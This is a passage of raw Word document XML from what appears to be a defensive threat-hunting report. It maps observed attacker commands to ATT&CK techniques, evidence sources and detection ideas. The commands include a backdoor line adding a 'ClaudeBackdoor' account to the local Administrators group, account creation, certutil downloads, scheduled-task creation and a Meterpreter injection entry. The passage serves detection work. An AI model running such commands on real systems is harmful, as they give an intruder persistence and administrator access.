        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net localgroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> should only be mapped as discovery techniques when the logs show enumeration commands; the previously observed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net localgroup Administrators ClaudeBackdoor /add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an account manipulation action, not discovery.</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3056"/>
        <w:gridCol w:w="2545"/>
        <w:gridCol w:w="2545"/>
      </w:tblGrid>
      <w:tr w14:paraId="61A6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033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A6E25C4">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A5C51D3">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t xml:space="preserve">Command </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68DFEB61">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35A7BE29">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="none"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="039097F9">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="none"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11B03C2B">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="none"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="bg1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>Detection Idea</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C98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033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30E55419">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>FreeClude.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FAF0009">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T1055.001 — Process Injection / Meterpreter Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="440D91C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Process Access/Injection events, SHA256 hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A3C6BC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Flag injection into standard Windows shell processes such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>cmd.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="43B0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033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25A06140">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>whoami.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6647B69A">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T1033 — System Owner/User Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E58255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Sysmon Event 1, command line, parent process, user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AD6B2AF">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Detect </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>whoami.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> launched from a suspicious payload or shell lineage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="77F8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033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="392373FC">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>systeminfo.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E770A3E">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T1082 — System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3441DD0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Sysmon Event 1, command line, parent process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4427A85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Detect system information collection from suspicious process lineage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="20752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033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0165CA77">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>net user /add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FC23445">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T1136.001 — Local Account Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2430522A">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Sysmon Event 1, Security Event 4720</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75C9846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Monitor account creation events outside authorized administrative workflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7748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033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19C7ACD0">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>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net localgroup ... /add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4229547F">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>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T1098.007 — Permission Groups Discovery / Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72AAF5CB">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Sysmon Event 1, Security Events 4728/4732</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F52FE57">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 xml:space="preserve">Detect unauthorized additions to high-privilege groups, such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Administrators</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E7D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033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E9E548F">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>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net.exe /delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="436C79EF">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>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Cleanup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29705C0B">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Sysmon Event 1, command-line execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="456EFB2D">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Flag commands attempting artifact removal or account deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3AAC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033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FB9689D">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>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certutil.exe -urlcache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5015DBB7">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>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T1105 — Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B315988">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Sysmon Event 1, Network Connection Event 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46B826D0">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 xml:space="preserve">Monitor </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>certutil.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> execution with flags commonly used for remote file downloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59D7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4" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16241B78">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>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schtasks.exe /create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="667A9D15">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>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T1053.005 — Scheduled Task/Job: Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
